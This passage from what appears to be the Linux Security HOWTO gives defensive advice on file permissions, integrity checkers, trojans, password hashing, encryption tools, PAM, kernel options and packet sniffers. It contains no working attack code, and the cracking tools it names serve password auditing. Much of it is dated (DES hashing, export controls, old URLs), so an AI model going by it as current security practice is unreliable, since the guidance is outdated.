    directories than when applied to files. If the sticky bit is set on a
    directory, then a user may only delete files that the he owns or for
    which he has explicit write permission granted, even when he has write
    access to the directory. This is designed for directories like /tmp,
    which are world-writable, but where it may not be desirable to allow any
    user to delete files at will. The sticky bit is seen as a t in a long
    directory listing.


SUID Attribute: (For Files)
     This describes set-user-id permissions on the file. When the set user ID
    access mode is set in the owner permissions, and the file is executable,
    processes which run it are granted access to system resources based on
    user who owns the file, as opposed to the user who created the process.
    This is the cause of many "buffer overflow" exploits.


SGID Attribute: (For Files)
     If set in the group permissions, this bit controls the "set group id"
    status of a file. This behaves the same way as SUID, except the group is
    affected instead. The file must be executable for this to have any
    effect.


SGID Attribute: (For directories)
     If you set the SGID bit on a directory (with chmod g+s directory), files
    created in that directory will have their group set to the directory's
    group.


 You - The owner of the file

 Group - The group you belong to

 Everyone - Anyone on the system that is not the owner or a member of the
group

 File Example:


        -rw-r--r--  1 kevin  users         114 Aug 28  1997 .zlogin
        1st bit - directory?             (no)
         2nd bit - read by owner?         (yes, by kevin)
          3rd bit - write by owner?        (yes, by kevin)
           4th bit - execute by owner?      (no)
            5th bit - read by group?         (yes, by users)
             6th bit - write by group?        (no)
              7th bit - execute by group?      (no)
               8th bit - read by everyone?      (yes, by everyone)
                9th bit - write by everyone?     (no)
                 10th bit - execute by everyone?  (no)


 The following lines are examples of the minimum sets of permissions that are
required to perform the access described. You may want to give more
permission than what's listed here, but this should describe what these
minimum permissions on files do:


-r--------  Allow read access to the file by owner
--w-------  Allows the owner to modify or delete the file
            (Note that anyone with write permission to the directory
             the file is in can overwrite it and thus delete it)
---x------  The owner can execute this program, but not shell scripts,
             which still need read permission
---s------  Will execute with effective User ID = to owner
--------s-  Will execute with effective Group ID = to group
-rw------T  No update of "last modified time".  Usually used for swap
             files
---t------  No effect.  (formerly sticky bit)

Directory Example:
        drwxr-xr-x  3 kevin  users         512 Sep 19 13:47 .public_html/
        1st bit - directory?             (yes, it contains many files)
         2nd bit - read by owner?         (yes, by kevin)
          3rd bit - write by owner?        (yes, by kevin)
           4th bit - execute by owner?      (yes, by kevin)
            5th bit - read by group?         (yes, by users
             6th bit - write by group?        (no)
              7th bit - execute by group?      (yes, by users)
               8th bit - read by everyone?      (yes, by everyone)
                9th bit - write by everyone?     (no)
                 10th bit - execute by everyone?  (yes, by everyone)


 The following lines are examples of the minimum sets of permissions that are
required to perform the access described. You may want to give more
permission than what's listed, but this should describe what these minimum
permissions on directories do:


dr--------  The contents can be listed, but file attributes can't be read
d--x------  The directory can be entered, and used in full execution paths
dr-x------  File attributes can be read by owner
d-wx------  Files can be created/deleted, even if the directory
             isn't the current one
d------x-t  Prevents files from deletion by others with write
             access. Used on /tmp
d---s--s--  No effect

 System configuration files (usually in /etc) are usually mode 640
(-rw-r-----), and owned by root. Depending on your site's security
requirements, you might adjust this. Never leave any system files writable by
a group or everyone. Some configuration files, including /etc/shadow, should
only be readable by root, and directories in /etc should at least not be
accessible by others.


SUID Shell Scripts
     SUID shell scripts are a serious security risk, and for this reason the
    kernel will not honor them. Regardless of how secure you think the shell
    script is, it can be exploited to give the cracker a root shell.


-----------------------------------------------------------------------------
5.3. Integrity Checking

 Another very good way to detect local (and also network) attacks on your
system is to run an integrity checker like Tripwire, Aide or Osiris. These
integrety checkers run a number of checksums on all your important binaries
and config files and compares them against a database of former, known-good
values as a reference. Thus, any changes in the files will be flagged.

 It's a good idea to install these sorts of programs onto a floppy, and then
physically set the write protect on the floppy. This way intruders can't
tamper with the integrety checker itself or change the database. Once you
have something like this setup, it's a good idea to run it as part of your
normal security administration duties to see if anything has changed.

 You can even add a crontab entry to run the checker from your floppy every
night and mail you the results in the morning. Something like:
                # set mailto
                MAILTO=kevin
                # run Tripwire
                15 05 * * * root /usr/local/adm/tcheck/tripwire
will mail you a report each morning at 5:15am.

 Integrity checkers can be a godsend to detecting intruders before you would
otherwise notice them. Since a lot of files change on the average system, you
have to be careful what is cracker activity and what is your own doing.

 You can find the freely available unsusported version of Tripwire at [http:/
/www.tripwire.org] http://www.tripwire.org, free of charge. Manuals and
support can be purchased.

 Aide can be found at [http://www.cs.tut.fi/~rammer/aide.html] http://
www.cs.tut.fi/~rammer/aide.html.

 Osiris can be found at [http://www.shmoo.com/osiris/] http://www.shmoo.com/
osiris/.
-----------------------------------------------------------------------------

5.4. Trojan Horses

 "Trojan Horses" are named after the fabled ploy in Virgil's "Aenid". The
idea is that a cracker distributes a program or binary that sounds great, and
encourages other people to download it and run it as root. Then the program
can compromise their system while they are not paying attention. While they
think the binary they just pulled down does one thing (and it might very
well), it also compromises their security.

 You should take care of what programs you install on your machine. RedHat
provides MD5 checksums and PGP signatures on its RPM files so you can verify
you are installing the real thing. Other distributions have similar methods.
You should never run any unfamiliar binary, for which you don't have the
source, as root. Few attackers are willing to release source code to public
scrutiny.

 Although it can be complex, make sure you are getting the source for a
program from its real distribution site. If the program is going to run as
root, make sure either you or someone you trust has looked over the source
and verified it.
-----------------------------------------------------------------------------

6. Password Security and Encryption

 One of the most important security features used today are passwords. It is
important for both you and all your users to have secure, unguessable
passwords. Most of the more recent Linux distributions include passwd
programs that do not allow you to set a easily guessable password. Make sure
your passwd program is up to date and has these features.

 In-depth discussion of encryption is beyond the scope of this document, but
an introduction is in order. Encryption is very useful, possibly even
necessary in this day and age. There are all sorts of methods of encrypting
data, each with its own set of characteristics.

 Most Unicies (and Linux is no exception) primarily use a one-way encryption
algorithm, called DES (Data Encryption Standard) to encrypt your passwords.
This encrypted password is then stored in (typically) /etc/passwd (or less
commonly) /etc/shadow. When you attempt to login, the password you type in is
encrypted again and compared with the entry in the file that stores your
passwords. If they match, it must be the same password, and you are allowed
access. Although DES is a two-way encryption algorithm (you can code and then
decode a message, given the right keys), the variant that most Unixes use is
one-way. This means that it should not be possible to reverse the encryption
to get the password from the contents of /etc/passwd (or /etc/shadow).

 Brute force attacks, such as "Crack" or "John the Ripper" (see section
Section 6.9) can often guess passwords unless your password is sufficiently
random. PAM modules (see below) allow you to use a different encryption
routine with your passwords (MD5 or the like). You can use Crack to your
advantage, as well. Consider periodically running Crack against your own
password database, to find insecure passwords. Then contact the offending
user, and instruct him to change his password.

 You can go to [http://consult.cern.ch/writeup/security/security_3.html]
http://consult.cern.ch/writeup/security/security_3.html for information on
how to choose a good password.
-----------------------------------------------------------------------------

6.1. PGP and Public-Key Cryptography

 Public-key cryptography, such as that used for PGP, uses one key for
encryption, and one key for decryption. Traditional cryptography, however,
uses the same key for encryption and decryption; this key must be known to
both parties, and thus somehow transferred from one to the other securely.

 To alleviate the need to securely transmit the encryption key, public-key
encryption uses two separate keys: a public key and a private key. Each
person's public key is available by anyone to do the encryption, while at the
same time each person keeps his or her private key to decrypt messages
encrypted with the correct public key.

 There are advantages to both public key and private key cryptography, and
you can read about those differences in [http://www.rsa.com/rsalabs/faq/] the
RSA Cryptography FAQ, listed at the end of this section.

 PGP (Pretty Good Privacy) is well-supported on Linux. Versions 2.6.2 and 5.0
are known to work well. For a good primer on PGP and how to use it, take a
look at the PGP FAQ: [http://www.pgp.com/service/export/faq/55faq.cgi] http:/
/www.pgp.com/service/export/faq/55faq.cgi

 Be sure to use the version that is applicable to your country. Due to export
restrictions by the US Government, strong-encryption is prohibited from being
transferred in electronic form outside the country.

 US export controls are now managed by EAR (Export Administration
Regulations). They are no longer governed by ITAR.

 There is also a step-by-step guide for configuring PGP on Linux available at
[http://mercury.chem.pitt.edu/~angel/LinuxFocus/English/November1997/
article7.html] http://mercury.chem.pitt.edu/~angel/LinuxFocus/English/
November1997/article7.html. It was written for the international version of
PGP, but is easily adaptable to the United States version. You may also need
a patch for some of the latest versions of Linux; the patch is available at
[ftp://metalab.unc.edu/pub/Linux/apps/crypto] ftp://metalab.unc.edu/pub/Linux
/apps/crypto.

 There is a project maintaining a free re-implementation of pgp with open
source. GnuPG is a complete and free replacement for PGP. Because it does not
use IDEA or RSA it can be used without any restrictions. GnuPG is in
compliance with [http://www.faqs.org/rfcs/rfc2440.html] OpenPGP. See the GNU
Privacy Guard web page for more information: [http://www.gnupg.org] http://
www.gnupg.org/.

 More information on cryptography can be found in the RSA cryptography FAQ,
available at [http://www.rsa.com/rsalabs/newfaq/] http://www.rsa.com/rsalabs/
newfaq/. Here you will find information on such terms as "Diffie-Hellman",
"public-key cryptography", "digital certificates", etc.
-----------------------------------------------------------------------------

6.2. SSL, S-HTTP and S/MIME

 Often users ask about the differences between the various security and
encryption protocols, and how to use them. While this isn't an encryption
document, it is a good idea to explain briefly what each protocol is, and
where to find more information.

<A0><A0>*<2A> SSL: - SSL, or Secure Sockets Layer, is an encryption method developed
    by Netscape to provide security over the Internet. It supports several
    different encryption protocols, and provides client and server
    authentication. SSL operates at the transport layer, creates a secure
    encrypted channel of data, and thus can seamlessly encrypt data of many
    types. This is most commonly seen when going to a secure site to view a
    secure online document with Communicator, and serves as the basis for
    secure communications with Communicator, as well as many other Netscape
    Communications data encryption. More information can be found at [http://
    www.consensus.com/security/ssl-talk-faq.html] http://www.consensus.com/
    security/ssl-talk-faq.html. Information on Netscape's other security
    implementations, and a good starting point for these protocols is
    available at [http://home.netscape.com/info/security-doc.html] http://
    home.netscape.com/info/security-doc.html. It's also worth noting that the
    SSL protocol can be used to pass many other common protocols, "wrapping"
    them for security. See [http://www.quiltaholic.com/rickk/sslwrap/] http:/
    /www.quiltaholic.com/rickk/sslwrap/

<A0><A0>*<2A> S-HTTP: - S-HTTP is another protocol that provides security services
    across the Internet. It was designed to provide confidentiality,
    authentication, integrity, and non-repudiability [cannot be mistaken for
    someone else] while supporting multiple key-management mechanisms and
    cryptographic algorithms via option negotiation between the parties
    involved in each transaction. S-HTTP is limited to the specific software
    that is implementing it, and encrypts each message individually. [ From
    RSA Cryptography FAQ, page 138]

<A0><A0>*<2A> S/MIME: - S/MIME, or Secure Multipurpose Internet Mail Extension, is an
    encryption standard used to encrypt electronic mail and other types of
    messages on the Internet. It is an open standard developed by RSA, so it
    is likely we will see it on Linux one day soon. More information on S/
    MIME can be found at [http://home.netscape.com/assist/security/smime/
    overview.html] http://home.netscape.com/assist/security/smime/
    overview.html.


-----------------------------------------------------------------------------
6.3. Linux IPSEC Implementations

 Along with CIPE, and other forms of data encryption, there are also several
other implementations of IPSEC for Linux. IPSEC is an effort by the IETF to
create cryptographically-secure communications at the IP network level, and
to provide authentication, integrity, access control, and confidentiality.
Information on IPSEC and Internet draft can be found at [http://www.ietf.org/
html.charters/ipsec-charter.html] http://www.ietf.org/html.charters/
ipsec-charter.html. You can also find links to other protocols involving key
management, and an IPSEC mailing list and archives.

 The x-kernel Linux implementation, which is being developed at the
University of Arizona, uses an object-based framework for implementing
network protocols called x-kernel, and can be found at [http://
www.cs.arizona.edu/xkernel/hpcc-blue/linux.html] http://www.cs.arizona.edu/
xkernel/hpcc-blue/linux.html. Most simply, the x-kernel is a method of
passing messages at the kernel level, which makes for an easier
implementation.

 Another freely-available IPSEC implementation is the Linux FreeS/WAN IPSEC.
Their web page states, ""These services allow you to build secure tunnels
through untrusted networks. Everything passing through the untrusted net is
encrypted by the IPSEC gateway machine and decrypted by the gateway at the
other end. The result is Virtual Private Network or VPN. This is a network
which is effectively private even though it includes machines at several
different sites connected by the insecure Internet.""

 It's available for download from [http://www.xs4all.nl/~freeswan/] http://
www.xs4all.nl/~freeswan/, and has just reached 1.0 at the time of this
writing.

 As with other forms of cryptography, it is not distributed with the kernel
by default due to export restrictions.
-----------------------------------------------------------------------------

6.4. ssh (Secure Shell) and stelnet

 ssh and stelnet are suites of programs that allow you to login to remote
systems and have a encrypted connection.

 openssh is a suite of programs used as a secure replacement for rlogin, rsh
and rcp. It uses public-key cryptography to encrypt communications between
two hosts, as well as to authenticate users. It can be used to securely login
to a remote host or copy data between hosts, while preventing
man-in-the-middle attacks (session hijacking) and DNS spoofing. It will
perform data compression on your connections, and secure X11 communications
between hosts.

 There are several ssh implementiations now. The original commercial
implementation by Data Fellows can be found at The ssh home page can be found
at [http://www.datafellows.com] http://www.datafellows.com.

 The excellent Openssh implementation is based on a early version of the
datafellows ssh and has been totally reworked to not include any patented or
proprietary pieces. It is free and under a BSD license. It can be found at:
[http://www.openssh.com] http://www.openssh.com.

 There is also a open source project to re-implement ssh from the ground up
called "psst...". For more information see: [http://www.net.lut.ac.uk/psst/]
http://www.net.lut.ac.uk/psst/

 You can also use ssh from your Windows workstation to your Linux ssh server.
There are several freely available Windows client implementations, including
the one at [http://guardian.htu.tuwien.ac.at/therapy/ssh/] http://
guardian.htu.tuwien.ac.at/therapy/ssh/ as well as a commercial implementation
from DataFellows, at [http://www.datafellows.com] http://www.datafellows.com.

 SSLeay is a free implementation of Netscape's Secure Sockets Layer protocol,
developed by Eric Young. It includes several applications, such as Secure
telnet, a module for Apache, several databases, as well as several algorithms
including DES, IDEA and Blowfish.

 Using this library, a secure telnet replacement has been created that does
encryption over a telnet connection. Unlike SSH, stelnet uses SSL, the Secure
Sockets Layer protocol developed by Netscape. You can find Secure telnet and
Secure FTP by starting with the SSLeay FAQ, available at [http://
www.psy.uq.oz.au/~ftp/Crypto/] http://www.psy.uq.oz.au/~ftp/Crypto/.

 SRP is another secure telnet/ftp implementation. From their web page:

 ""The SRP project is developing secure Internet software for free worldwide
use. Starting with a fully-secure Telnet and FTP distribution, we hope to
supplant weak networked authentication systems with strong replacements that
do not sacrifice user-friendliness for security. Security should be the
default, not an option!" "

 For more information, go to [http://www-cs-students.stanford.edu/~tjw/srp/]
http://www-cs-students.stanford.edu/~tjw/srp/
-----------------------------------------------------------------------------

6.5. PAM - Pluggable Authentication Modules

 Newer versions of the Red Hat Linux and Debian Linux distributions ship with
a unified authentication scheme called "PAM". PAM allows you to change your
authentication methods and requirements on the fly, and encapsulate all local
authentication methods without recompiling any of your binaries.
Configuration of PAM is beyond the scope of this document, but be sure to
take a look at the PAM web site for more information. [http://www.kernel.org/
pub/linux/libs/pam/index.html] http://www.kernel.org/pub/linux/libs/pam/
index.html.

 Just a few of the things you can do with PAM:


<A0><A0>*<2A> Use encryption other than DES for your passwords. (Making them harder to
    brute-force decode)

<A0><A0>*<2A> Set resource limits on all your users so they can't perform
    denial-of-service attacks (number of processes, amount of memory, etc)

<A0><A0>*<2A> Enable shadow passwords (see below) on the fly

<A0><A0>*<2A> allow specific users to login only at specific times from specific
    places


 Within a few hours of installing and configuring your system, you can
prevent many attacks before they even occur. For example, use PAM to disable
the system-wide usage of .rhosts files in user's home directories by adding
these lines to /etc/pam.d/rlogin:
                #
                # Disable rsh/rlogin/rexec for users
                #
                login auth required pam_rhosts_auth.so no_rhosts
-----------------------------------------------------------------------------

6.6. Cryptographic IP Encapsulation (CIPE)

 The primary goal of this software is to provide a facility for secure
(against eavesdropping, including traffic analysis, and faked message
injection) subnetwork interconnection across an insecure packet network such
as the Internet.

 CIPE encrypts the data at the network level. Packets traveling between hosts
on the network are encrypted. The encryption engine is placed near the driver
which sends and receives packets.

 This is unlike SSH, which encrypts the data by connection, at the socket
level. A logical connection between programs running on different hosts is
encrypted.

 CIPE can be used in tunnelling, in order to create a Virtual Private
Network. Low-level encryption has the advantage that it can be made to work
transparently between the two networks connected in the VPN, without any
change to application software.

 Summarized from the CIPE documentation:

 "The IPSEC standards define a set of protocols which can be used (among
other things) to build encrypted VPNs. However, IPSEC is a rather heavyweight
and complicated protocol set with a lot of options, implementations of the
full protocol set are still rarely used and some issues (such as key
management) are still not fully resolved. CIPE uses a simpler approach, in
which many things which can be parameterized (such as the choice of the
actual encryption algorithm used) are an install-time fixed choice. This
limits flexibility, but allows for a simple (and therefore efficient, easy to
debug...) implementation."

 Further information can be found at [http://www.inka.de/~bigred/devel/
cipe.html] http://www.inka.de/~bigred/devel/cipe.html

 As with other forms of cryptography, it is not distributed with the kernel
by default due to export restrictions.
-----------------------------------------------------------------------------

6.7. Kerberos

 Kerberos is an authentication system developed by the Athena Project at MIT.
When a user logs in, Kerberos authenticates that user (using a password), and
provides the user with a way to prove her identity to other servers and hosts
scattered around the network.

 This authentication is then used by programs such as rlogin to allow the
user to login to other hosts without a password (in place of the .rhosts
file). This authentication method can also used by the mail system in order
to guarantee that mail is delivered to the correct person, as well as to
guarantee that the sender is who he claims to be.

 Kerberos and the other programs that come with it, prevent users from
"spoofing" the system into believing they are someone else. Unfortunately,
installing Kerberos is very intrusive, requiring the modification or
replacement of numerous standard programs.

 You can find more information about kerberos by looking at [http://
www.cis.ohio-state.edu/hypertext/faq/usenet/kerberos-faq/general/faq.html]
the kerberos FAQ, and the code can be found at [http://nii.isi.edu/info/
kerberos/] http://nii.isi.edu/info/kerberos/.

 [From: Stein, Jennifer G., Clifford Neuman, and Jeffrey L. Schiller.
"Kerberos: An Authentication Service for Open Network Systems." USENIX
Conference Proceedings, Dallas, Texas, Winter 1998.]

 Kerberos should not be your first step in improving security of your host.
It is quite involved, and not as widely used as, say, SSH.
-----------------------------------------------------------------------------

6.8. Shadow Passwords.

 Shadow passwords are a means of keeping your encrypted password information
secret from normal users. Recent versions of both Red Hat and Debian Linux
use shadow passwords by default, but on other systems, encrypted passwords
are stored in /etc/passwd file for all to read. Anyone can then run
password-guesser programs on them and attempt to determine what they are.
Shadow passwords, by contrast, are saved in /etc/shadow, which only
privileged users can read. In order to use shadow passwords, you need to make
sure all your utilities that need access to password information are
recompiled to support them. PAM (above) also allows you to just plug in a
shadow module; it doesn't require re-compilation of executables. You can
refer to the Shadow-Password HOWTO for further information if necessary. It
is available at [http://metalab.unc.edu/LDP/HOWTO/Shadow-Password-HOWTO.html]
http://metalab.unc.edu/LDP/HOWTO/Shadow-Password-HOWTO.html It is rather
dated now, and will not be required for distributions supporting PAM.
-----------------------------------------------------------------------------

6.9. "Crack" and "John the Ripper"

 If for some reason your passwd program is not enforcing hard-to-guess
passwords, you might want to run a password-cracking program and make sure
your users' passwords are secure.

 Password cracking programs work on a simple idea: they try every word in the
dictionary, and then variations on those words, encrypting each one and
checking it against your encrypted password. If they get a match they know
what your password is.

 There are a number of programs out there...the two most notable of which are
"Crack" and "John the Ripper" ([http://www.openwall.com/john/] http://
www.openwall.com/john/) . They will take up a lot of your CPU time, but you
should be able to tell if an attacker could get in using them by running them
first yourself and notifying users with weak passwords. Note that an attacker
would have to use some other hole first in order to read your /etc/passwd
file, but such holes are more common than you might think.

 Because security is only as strong as the most insecure host, it is worth
mentioning that if you have any Windows machines on your network, you should
check out L0phtCrack, a Crack implementation for Windows. It's available from
[http://www.l0pht.com] http://www.l0pht.com
-----------------------------------------------------------------------------

6.10. CFS - Cryptographic File System and TCFS - Transparent Cryptographic
File System

 CFS is a way of encrypting entire directory trees and allowing users to
store encrypted files on them. It uses an NFS server running on the local
machine. RPMS are available at [http://www.zedz.net/redhat/] http://
www.zedz.net/redhat/, and more information on how it all works is at [ftp://
ftp.research.att.com/dist/mab/] ftp://ftp.research.att.com/dist/mab/.

 TCFS improves on CFS by adding more integration with the file system, so
that it's transparent to users that the file system that is encrypted. More
information at: [http://www.tcfs.it/] http://www.tcfs.it/.

 It also need not be used on entire file systems. It works on directory trees
as well.
-----------------------------------------------------------------------------

6.11. X11, SVGA and display security

6.11.1. X11

 It's important for you to secure your graphical display to prevent attackers
from grabbing your passwords as you type them, reading documents or
information you are reading on your screen, or even using a hole to gain root
access. Running remote X applications over a network also can be fraught with
peril, allowing sniffers to see all your interaction with the remote system.

 X has a number of access-control mechanisms. The simplest of them is
host-based: you use xhost to specify the hosts that are allowed access to
your display. This is not very secure at all, because if someone has access
to your machine, they can xhost + their machine and get in easily. Also, if
you have to allow access from an untrusted machine, anyone there can
compromise your display.

 When using xdm (X Display Manager) to log in, you get a much better access
method: MIT-MAGIC-COOKIE-1. A 128-bit "cookie" is generated and stored in
your .Xauthority file. If you need to allow a remote machine access to your
display, you can use the xauth command and the information in your
.Xauthority file to provide access to only that connection. See the
Remote-X-Apps mini-howto, available at [http://metalab.unc.edu/LDP/HOWTO/mini
/Remote-X-Apps.html] http://metalab.unc.edu/LDP/HOWTO/mini/
Remote-X-Apps.html.

 You can also use ssh (see Section 6.4, above) to allow secure X connections.
This has the advantage of also being transparent to the end user, and means
that no unencrypted data flows across the network.

 You can also disable any remote connections to your X server by using the
'-nolisten tcp' options to your X server. This will prevent any network
connections to your server over tcp sockets.

 Take a look at the Xsecurity man page for more information on X security.
The safe bet is to use xdm to login to your console and then use ssh to go to
remote sites on which you wish to run X programs.
-----------------------------------------------------------------------------

6.11.2. SVGA

 SVGAlib programs are typically SUID-root in order to access all your Linux
machine's video hardware. This makes them very dangerous. If they crash, you
typically need to reboot your machine to get a usable console back. Make sure
any SVGA programs you are running are authentic, and can at least be somewhat
trusted. Even better, don't run them at all.
-----------------------------------------------------------------------------

6.11.3. GGI (Generic Graphics Interface project)

 The Linux GGI project is trying to solve several of the problems with video
interfaces on Linux. GGI will move a small piece of the video code into the
Linux kernel, and then control access to the video system. This means GGI
will be able to restore your console at any time to a known good state. They
will also allow a secure attention key, so you can be sure that there is no
Trojan horse login program running on your console. [http://
synergy.caltech.edu/~ggi/] http://synergy.caltech.edu/~ggi/
-----------------------------------------------------------------------------

7. Kernel Security

 This is a description of the kernel configuration options that relate to
security, and an explanation of what they do, and how to use them.

 As the kernel controls your computer's networking, it is important that it
be very secure, and not be compromised. To prevent some of the latest
networking attacks, you should try to keep your kernel version current. You
can find new kernels at [ftp://ftp.kernel.org] ?? or from your distribution
vendor.

 There is also a international group providing a single unified crypto patch
to the mainstream Linux kernel. This patch provides support for a number of
cryptographic subsystems and things that cannot be included in the mainstream
kernel due to export restrictions. For more information, visit their web page
at: [http://www.kerneli.org] http://www.kerneli.org
-----------------------------------------------------------------------------

7.1. 2.0 Kernel Compile Options

 For 2.0.x kernels, the following options apply. You should see these options
during the kernel configuration process. Many of the comments here are from .
/linux/Documentation/Configure.help, which is the same document that is
referenced while using the Help facility during the make config stage of
compiling the kernel.


<A0><A0>*<2A> Network Firewalls (CONFIG_FIREWALL)

     This option should be on if you intend to run any firewalling or
    masquerading on your Linux machine. If it's just going to be a regular
    client machine, it's safe to say no.

<A0><A0>*<2A> IP: forwarding/gatewaying (CONFIG_IP_FORWARD)

     If you enable IP forwarding, your Linux box essentially becomes a
    router. If your machine is on a network, you could be forwarding data
    from one network to another, and perhaps subverting a firewall that was
    put there to prevent this from happening. Normal dial-up users will want
    to disable this, and other users should concentrate on the security
    implications of doing this. Firewall machines will want this enabled, and
    used in conjunction with firewall software.

     You can enable IP forwarding dynamically using the following command:


            root#  echo 1 > /proc/sys/net/ipv4/ip_forward
    and disable it with the command:
            root#  echo 0 > /proc/sys/net/ipv4/ip_forward
    Keep in mind the files in /proc are "virtual" files and the shown size of
    the file might not reflect the data output from it.

<A0><A0>*<2A> IP: syn cookies (CONFIG_SYN_COOKIES)

     a "SYN Attack" is a denial of service (DoS) attack that consumes all the
    resources on your machine, forcing you to reboot. We can't think of a
    reason you wouldn't normally enable this. In the 2.2.x kernel series this
    config option merely allows syn cookies, but does not enable them. To
    enable them, you have to do:


                    root# echo 1 > /proc/sys/net/ipv4/tcp_syncookies <P>

<A0><A0>*<2A> IP: Firewalling (CONFIG_IP_FIREWALL)

     This option is necessary if you are going to configure your machine as a
    firewall, do masquerading, or wish to protect your dial-up workstation
    from someone entering via your PPP dial-up interface.

<A0><A0>*<2A> IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE)

     This option gives you information about packets your firewall received,
    like sender, recipient, port, etc.

<A0><A0>*<2A> IP: Drop source routed frames (CONFIG_IP_NOSR)

     This option should be enabled. Source routed frames contain the entire
    path to their destination inside of the packet. This means that routers
    through which the packet goes do not need to inspect it, and just forward
    it on. This could lead to data entering your system that may be a
    potential exploit.

<A0><A0>*<2A> IP: masquerading (CONFIG_IP_MASQUERADE) If one of the computers on your
    local network for which your Linux box acts as a firewall wants to send
    something to the outside, your box can "masquerade" as that host, i.e.,
    it forewords the traffic to the intended destination, but makes it look
    like it came from the firewall box itself. See [http://www.indyramp.com/
    masq] http://www.indyramp.com/masq for more information.

<A0><A0>*<2A> IP: ICMP masquerading (CONFIG_IP_MASQUERADE_ICMP) This option adds ICMP
    masquerading to the previous option of only masquerading TCP or UDP
    traffic.

<A0><A0>*<2A> IP: transparent proxy support (CONFIG_IP_TRANSPARENT_PROXY) This enables
    your Linux firewall to transparently redirect any network traffic
    originating from the local network and destined for a remote host to a
    local server, called a "transparent proxy server". This makes the local
    computers think they are talking to the remote end, while in fact they
    are connected to the local proxy. See the IP-Masquerading HOWTO and
    [http://www.indyramp.com/masq] http://www.indyramp.com/masq for more
    information.

<A0><A0>*<2A> IP: always defragment (CONFIG_IP_ALWAYS_DEFRAG)

     Generally this option is disabled, but if you are building a firewall or
    a masquerading host, you will want to enable it. When data is sent from
    one host to another, it does not always get sent as a single packet of
    data, but rather it is fragmented into several pieces. The problem with
    this is that the port numbers are only stored in the first fragment. This
    means that someone can insert information into the remaining packets that
    isn't supposed to be there. It could also prevent a teardrop attack
    against an internal host that is not yet itself patched against it.

<A0><A0>*<2A> Packet Signatures (CONFIG_NCPFS_PACKET_SIGNING)

     This is an option that is available in the 2.2.x kernel series that will
    sign NCP packets for stronger security. Normally you can leave it off,
    but it is there if you do need it.

<A0><A0>*<2A> IP: Firewall packet netlink device (CONFIG_IP_FIREWALL_NETLINK)

     This is a really neat option that allows you to analyze the first 128
    bytes of the packets in a user-space program, to determine if you would
    like to accept or deny the packet, based on its validity.


-----------------------------------------------------------------------------
7.2. 2.2 Kernel Compile Options

 For 2.2.x kernels, many of the options are the same, but a few new ones have
been developed. Many of the comments here are from ./linux/Documentation/
Configure.help, which is the same document that is referenced while using the
Help facility during the make config stage of compiling the kernel. Only the
newly- added options are listed below. Consult the 2.0 description for a list
of other necessary options. The most significant change in the 2.2 kernel
series is the IP firewalling code. The ipchains program is now used to
install IP firewalling, instead of the ipfwadm program used in the 2.0
kernel.


<A0><A0>*<2A> Socket Filtering (CONFIG_FILTER)

     For most people, it's safe to say no to this option. This option allows
    you to connect a user-space filter to any socket and determine if packets
    should be allowed or denied. Unless you have a very specific need and are
    capable of programming such a filter, you should say no. Also note that
    as of this writing, all protocols were supported except TCP.

<A0><A0>*<2A> Port Forwarding

     Port Forwarding is an addition to IP Masquerading which allows some
    forwarding of packets from outside to inside a firewall on given ports.
    This could be useful if, for example, you want to run a web server behind
    the firewall or masquerading host and that web server should be
    accessible from the outside world. An external client sends a request to
    port 80 of the firewall, the firewall forwards this request to the web
    server, the web server handles the request and the results are sent
    through the firewall to the original client. The client thinks that the
    firewall machine itself is running the web server. This can also be used
    for load balancing if you have a farm of identical web servers behind the
    firewall.

     Information about this feature is available from http://
    www.monmouth.demon.co.uk/ipsubs/portforwarding.html (to browse the WWW,
    you need to have access to a machine on the Internet that has a program
    like lynx or Netscape). For general info, please see ftp://
    ftp.compsoc.net/users/steve/ipportfw/linux21/

<A0><A0>*<2A> Socket Filtering (CONFIG_FILTER)

     Using this option, user-space programs can attach a filter to any socket
    and thereby tell the kernel that it should allow or disallow certain
    types of data to get through the socket. Linux socket filtering works on
    all socket types except TCP for now. See the text file ./linux/
    Documentation/networking/filter.txt for more information.

<A0><A0>*<2A> IP: Masquerading

     The 2.2 kernel masquerading has been improved. It provides additional
    support for masquerading special protocols, etc. Be sure to read the IP
    Chains HOWTO for more information.


-----------------------------------------------------------------------------
7.3. Kernel Devices

 There are a few block and character devices available on Linux that will
also help you with security.

 The two devices /dev/random and /dev/urandom are provided by the kernel to
provide random data at any time.

 Both /dev/random and /dev/urandom should be secure enough to use in
generating PGP keys, ssh challenges, and other applications where secure
random numbers are required. Attackers should be unable to predict the next
number given any initial sequence of numbers from these sources. There has
been a lot of effort put in to ensuring that the numbers you get from these
sources are random in every sense of the word.

 The only difference between the two devices, is that /dev/random runs out of
random bytes and it makes you wait for more to be accumulated. Note that on
some systems, it can block for a long time waiting for new user-generated
entropy to be entered into the system. So you have to use care before using /
dev/random. (Perhaps the best thing to do is to use it when you're generating
sensitive keying information, and you tell the user to pound on the keyboard
repeatedly until you print out "OK, enough".)

 /dev/random is high quality entropy, generated from measuring the
inter-interrupt times etc. It blocks until enough bits of random data are
available.

 /dev/urandom is similar, but when the store of entropy is running low, it'll
return a cryptographically strong hash of what there is. This isn't as
secure, but it's enough for most applications.

 You might read from the devices using something like:


        root#  head -c 6 /dev/urandom | mimencode
This will print six random characters on the console, suitable for password
generation. You can find mimencode in the metamail package.

 See /usr/src/linux/drivers/char/random.c for a description of the algorithm.

 Thanks to Theodore Y. Ts'o, Jon Lewis, and others from Linux-kernel for
helping me (Dave) with this.
-----------------------------------------------------------------------------

8. Network Security

 Network security is becoming more and more important as people spend more
and more time connected. Compromising network security is often much easier
than compromising physical or local security, and is much more common.

 There are a number of good tools to assist with network security, and more
and more of them are shipping with Linux distributions.
-----------------------------------------------------------------------------

8.1. Packet Sniffers

 One of the most common ways intruders gain access to more systems on your
network is by employing a packet sniffer on a already compromised host. This
"sniffer" just listens on the Ethernet port for things like passwd and login
and su in the packet stream and then logs the traffic after that. This way,
attackers gain passwords for systems they are not even attempting to break
into. Clear-text passwords are very vulnerable to this attack.

 Example: Host A has been compromised. Attacker installs a sniffer. Sniffer
picks up admin logging into Host B from Host C. It gets the admins personal
password as they login to B. Then, the admin does a su to fix a problem. They
now have the root password for Host B. Later the admin lets someone telnet
from his account to Host Z on another site. Now the attacker has a password/
login on Host Z.

 In this day and age, the attacker doesn't even need to compromise a system
to do this: they could also bring a laptop or pc into a building and tap into
your net.

 Using ssh or other encrypted password methods thwarts this attack. Things
like APOP for POP accounts also prevents this attack. (Normal POP logins are
very vulnerable to this, as is anything that sends clear-text passwords over
the network.)
-----------------------------------------------------------------------------

